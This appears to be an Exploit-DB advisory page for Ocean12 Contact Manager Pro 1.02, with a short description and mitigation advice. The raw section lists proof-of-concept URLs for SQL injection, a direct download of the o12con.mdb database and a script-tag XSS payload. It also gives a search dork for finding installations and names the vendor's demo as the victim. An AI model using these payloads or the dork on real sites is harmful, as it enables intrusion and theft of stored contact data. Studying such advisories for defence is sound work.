header-logo
Suggest Exploit
vendor:
Contact Manager Pro
by:
Pouya_Server
7.5
CVSS
HIGH
DDV,XSS,SQL
89,79,79
CWE
Product Name: Contact Manager Pro
Affected Version From: 01.02
Affected Version To: 01.02
Patch Exists: NO
Related CWE: N/A
CPE: ocean12tech.com/products/contact
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Ocean12 Contact Manager Pro

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'DisplayFormat' and 'Sort' parameters of the 'default.asp' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Additionally, the vulnerability can be exploited to disclose the 'o12con.mdb' database and to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to prevent direct access to the 'o12con.mdb' database.
Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Contact Manager Pro
Version : 1.02
Vendor : http://ocean12tech.com/products/contact
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DDV,XSS,SQL)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
 
[Database Disclosure Vulnerability]:
http://site.com/path/o12con.mdb
 
[XSS]:
http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server
---------------------------------
Victem :
http://ocean12tech.com/products/contact/demo

# milw0rm.com [2008-11-27]